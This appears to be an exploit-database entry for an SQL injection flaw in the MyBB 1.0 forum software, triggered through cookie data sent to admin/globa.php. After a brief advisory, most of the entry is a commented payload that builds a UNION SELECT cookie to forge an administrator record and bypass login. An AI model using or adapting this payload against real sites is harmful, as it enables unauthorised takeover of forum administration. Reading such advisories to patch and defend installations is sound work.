MyBB 1.0 Globa.PHP Cookie Data SQL Injection Vulnerability

ID: 48909
CVE: None
Download vulnerable application: None

MyBB is prone to an SQL injection vulnerability.

The vulnerability presents itself when user-supplied input via cookie data is passed to the 'admin/globa.php' script.

Successful exploitation can allow an attacker to bypass authentication and gain administrative access to a site. Other attacks may also be possible.

MyBB 1.0 is reportedly vulnerable. 

string expcookie="imei'" //garbrage field that actually is not an uid + an inject sign +" union select '1' as uid," //return no admin union our sniffed admin +" '','','','xxx'as loginkey ,"//we have not any info! so null them; only login key cheked that we fill with xxx +" '','','','',"//null fields befor usergroup +" 4 as usergroup";// ok! our sniffed admin is an admin : D !! for (int i=0;i< 49;i++) expcookie+=",''"; //null all of other fields!expcookie+="-- imei" // remark rest of SQL +"_xxx" ;
1-4-2 (www01)